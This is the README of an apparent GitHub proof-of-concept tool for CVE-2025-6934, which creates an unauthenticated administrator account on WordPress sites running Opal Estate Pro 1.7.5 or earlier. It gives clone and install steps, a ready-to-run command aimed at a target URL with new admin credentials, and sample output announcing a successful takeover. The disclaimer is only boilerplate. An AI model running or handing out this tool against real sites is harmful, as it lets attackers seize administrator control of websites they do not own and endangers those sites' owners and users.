CVE-2025-6934 Auto Exploit

---

⚡ Overview

CVE-2025-6934 is a proof-of-concept (PoC) exploit targeting WordPress Plugin: Opal Estate Pro ≤ 1.7.5.
This exploit demonstrates unauthenticated administrator account creation.

Disclaimer: This PoC is for educational purposes only. Do not use on systems without permission.

---

🛠 Features

• Detect plugin version automatically.
• Retrieve required nonce for registration.
• Create a new administrator account without authentication.
• Colorful console output with status, success, failure, and info messages.
• Works on Python 3.x with minimal dependencies.

---

⚙️ Installation

1. Clone the repository:

git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934

2. Install dependencies:

pip install -r requirements.txt

Requirements: requests, beautifulsoup4, colorama

---

🚀 Usage

python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>

Example:

python3 main.py -u http://site.com/ -mail admin@horsefucker.org -password 3xplo1tI5Fun -user r1337

Arguments

Flag	Description	Required	Default
-u, --url	Target site URL	Yes	-
-mail, --newmail	Email for new admin	Yes	-
-password, --newpassword	Password for new admin	Yes	-
-user, --username	Username for new admin	No	administrator

---

🎨 Output

The console shows:

• Status messages [•]
• Success [✔]
• Fail [✖]
• Info [i]

Example:

[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
    Username : r1337
    Email    : admin@horsefucker.org
    Password : 3xplo1tI5Fun
    Role     : administrator

---

🔐 Security & Disclaimer

• For educational & testing purposes only.
• Do not attack websites without explicit permission.
• Use in a controlled lab or authorized penetration test only

---

🔗 Connect with Me

I'm an active developer who enjoys building tools and sharing knowledge. You can reach me through: